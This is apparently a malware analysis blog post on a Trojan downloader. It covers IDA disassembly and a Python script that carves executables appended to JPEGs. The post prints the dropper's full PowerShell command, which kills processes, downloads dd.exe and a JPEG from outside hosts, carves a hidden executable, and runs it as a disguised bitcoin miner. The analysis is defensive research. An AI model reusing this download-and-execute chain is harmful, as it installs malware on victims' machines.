Analysis: Trojan.Downloader.9da0a9fb4f6a044b83ebf829dc1950eccc07c077a3a32f1378f5f6f19f28192c

A look at a Trojan.Downloader I came across on VirusTotal Intelligence. It turned out to be a file hiding more secrets than a wife hiding an affair!

The binary has a single function of interest, main(), and PEStudio identifies the compiler as MinGW (signature: MingWin32 v?.? (h)). The section layout is the standard one (.text, .data, .rdata, .bss, .idata), which suggests the binary has not been packed.

The function of interest (main) looks as follows:

.text:00401290 ; =============== S U B R O U T I N E =======================================
.text:00401290
.text:00401290 ; Attributes: bp-based frame
.text:00401290
.text:00401290 ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:00401290                 public _main
.text:00401290 _main           proc near               ; CODE XREF: ___mingw_CRTStartup+E2p
.text:00401290
.text:00401290 Command         = dword ptr -8
.text:00401290 var_4           = dword ptr -4
.text:00401290 argc            = dword ptr  8
.text:00401290 argv            = dword ptr  0Ch
.text:00401290 envp            = dword ptr  10h
.text:00401290
.text:00401290                 push    ebp
.text:00401291                 mov     ebp, esp
.text:00401293                 sub     esp, 8
.text:00401296                 and     esp, 0FFFFFFF0h
.text:00401299                 mov     eax, 0
.text:0040129E                 add     eax, 0Fh
.text:004012A1                 add     eax, 0Fh
.text:004012A4                 shr     eax, 4
.text:004012A7                 shl     eax, 4
.text:004012AA                 mov     [ebp+var_4], eax
.text:004012AD                 mov     eax, [ebp+var_4]
.text:004012B0                 call    __alloca
.text:004012B5                 call    ___main
.text:004012BA                 mov     [esp+8+Command], offset Command ; "powershell \"Stop-Process -NAME mscl -F"...
.text:004012C1                 call    _system
.text:004012C6                 mov     eax, 0
.text:004012CB                 leave
.text:004012CC                 retn
.text:004012CC _main           endp
.text:004012CC
.text:004012CC ; ---------------------------------------------------------------------------

Looking through the disassembly above there are two things to notice:

1. .text:004012BA mov [esp+8+Command], offset Command ; "powershell \"Stop-Process -NAME mscl -F"...
2. .text:004012C1 call _system

Command is the string handed to the C runtime's system() function (http://www.cplusplus.com/reference/cstdlib/system/), which on Windows runs it through cmd.exe. Everything the dropper does is in that one string; there is no other logic in the binary.

The command, shown here as the C string literal from the binary (so the inner double quotes are escaped with backslashes), is as follows:

powershell \"Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg');(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');Start-Sleep -s 10;(New-Object -com Shell.Application).ShellExecute('svchost.exe');\"

So powershell.exe is launched and a chain of statements is executed. Split on the semicolons they are:

Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;
(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');
(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg');
(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');
Start-Sleep -s 10;
(New-Object -com Shell.Application).ShellExecute('svchost.exe');

Reading them in order: the five Stop-Process calls kill any running processes with those names, with -ErrorAction SilentlyContinue so that a missing process does not abort the chain. The two WebClient downloads save dd.exe and favicon.jpg into the current working directory (relative paths), dd.exe is then run through the Shell.Application COM object, the script sleeps 10 seconds so dd can finish, and finally the freshly written svchost.exe is launched the same way.

As it stands the script doesn't actually run, because the HTTPS download fails; but what if it did… Let's keep exploring.

The script downloads dd, the Windows port (rawwrite dd) of the Unix utility used to convert and copy files. It also downloads an image, saves it as favicon.jpg, and then runs dd over it with bs=1 and skip=2931, which copies everything from byte offset 2931 of the image to the end of the file into svchost.exe.

That is pretty… odd… for an image. It means there is something hidden inside that JPEG, a form of steganography by simply appending a payload to the picture. Running the same dd command against the downloaded image:

$ dd.exe if=favicon.jpg of=svchost.exe skip=2931 bs=1
rawwrite dd for windows version 0.6beta3.
Written by John Newbigin <[email protected]>
This program is covered by terms of the GPL Version 2.

skip to 2931
343040+0 records in
343040+0 records out

Things get pretty interesting here. svchost.exe is a valid PE binary. With bs=1 each record is one byte, so 343040 records means 343040 bytes were copied; the image is therefore 2931 + 343040 = 345,971 bytes, with a genuine JPEG occupying the first 2931. Appending data after a JPEG's End-Of-Image marker doesn't invalidate the image, because decoders stop reading at that marker, so the file still displays as a picture and could be hosted on imagehousing.com without raising eyebrows! Pretty cool if you ask me!

In any event svchost.exe (named to blend in with the legitimate Windows service host process) is a 64-bit bitcoin miner 🙂
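The dropper hard-codes the offset (skip=2931) because whoever built the image knew where the JPEG ended. When you meet such a file without the dropper, you want to find that boundary yourself and then sanity-check what comes after it. The script below is an added example, not code from the original post: it walks the JPEG marker segments to find the End-Of-Image marker (rather than searching for the last FFD9, which an EXIF thumbnail or the payload itself could fake), carves the trailing bytes exactly as `dd if=favicon.jpg of=svchost.exe skip=N bs=1` would, and reads the PE header's Machine field to confirm the carved file is a 64-bit executable. The sample image is constructed inline (a minimal JPEG skeleton with a decoy FFD9 inside an APP1 segment, followed by a fake PE header); the real favicon.jpg and svchost.exe are not reproduced here.

```python
"""Locate and carve an executable appended to a JPEG, then identify its
PE machine type. Added example; the JPEG and PE bytes below are
constructed for illustration, not taken from the analysed sample."""
import struct
from typing import Optional, Tuple

SOI = b"\xff\xd8"
EOI = b"\xff\xd9"
# Markers that carry no length field: TEM, RST0..RST7, SOI.
STANDALONE = {0x01} | set(range(0xD0, 0xD9))
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0xAA64: "ARM64"}


def jpeg_end_offset(data: bytes) -> int:
    """Return the offset just past the End-Of-Image marker.

    Segments are walked by their length fields, so an FFD9 embedded in an
    APP segment (e.g. an EXIF thumbnail) is skipped over, not mistaken for
    the end of the picture. Inside entropy-coded data 0xFF is always followed
    by 0x00 (byte stuffing) or an RSTn marker, so the first other marker
    after SOS is a real one."""
    if data[:2] != SOI:
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        pos += 2
        if marker == 0xD9:              # EOI: the picture ends here
            return pos
        if marker in STANDALONE:
            continue
        seglen, = struct.unpack(">H", data[pos:pos + 2])
        pos += seglen                   # length includes the 2 length bytes
        if marker == 0xDA:              # SOS: skip entropy-coded data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def dd_skip(data: bytes, skip: int, bs: int = 1) -> bytes:
    """What `dd if=... skip=N bs=B` does: drop the first N*B bytes."""
    return data[skip * bs:]


def carve_trailing_payload(data: bytes) -> Tuple[int, bytes]:
    """Find the JPEG end and return (offset, everything after it)."""
    start = jpeg_end_offset(data)
    return start, dd_skip(data, start)


def pe_machine(blob: bytes) -> Optional[str]:
    """Read IMAGE_FILE_HEADER.Machine; None if blob is not a PE file."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew, = struct.unpack_from("<I", blob, 0x3C)
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, = struct.unpack_from("<H", blob, e_lfanew + 4)
    return MACHINE_NAMES.get(machine, f"unknown ({machine:#06x})")


def build_sample() -> bytes:
    """Constructed test file: tiny JPEG skeleton + fake 64-bit PE header."""
    app0 = b"\xff\xe0" + struct.pack(">H", 2 + 4) + b"JFIF"
    # APP1 whose body contains a decoy FFD9, as an embedded thumbnail would.
    decoy = b"\xff\xe1" + struct.pack(">H", 2 + 6) + b"ab\xff\xd9cd"
    # SOS header followed by entropy data with a stuffed FF00 inside.
    sos = b"\xff\xda" + struct.pack(">H", 2 + 1) + b"\x01" + b"\x12\xff\x00\x34"
    image = SOI + app0 + decoy + sos + EOI          # 31 bytes
    dos = bytearray(0x40)                            # minimal DOS header
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> PE header
    pe = b"PE\0\0" + struct.pack("<H", 0x8664) + b"\0" * 18
    return image + bytes(dos) + pe


if __name__ == "__main__":
    sample = build_sample()
    offset, payload = carve_trailing_payload(sample)
    print(f"JPEG ends at byte {offset}; {len(payload)} trailing bytes")
    print(f"trailing data PE machine: {pe_machine(payload)}")
```

On the real favicon.jpg the offset reported by jpeg_end_offset should be 2931 and the carved blob should match the svchost.exe that dd produced (343040 bytes); any image host that re-encodes uploads would have stripped the trailing data, which is why the attacker needed one that serves the original bytes.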

References

VirusTotal
original binary - https://www.virustotal.com/en/file/9da0a9fb4f6a044b83ebf829dc1950eccc07c077a3a32f1378f5f6f19f28192c/analysis/
favicon.jpg - https://www.virustotal.com/file/43deab7498966d3d955fa23fbfd9cc2d5c363417c8eddd4b8db8e3e0fdeeb28f/analysis/
svchost.exe - https://www.virustotal.com/file/0ab9eed74a03bce3b40e02c77f74718c7110ceadd946484da9227c2f2a76cdbe/analysis/

Tools
PEStudio - https://www.winitor.com/
Hex-Rays IDA
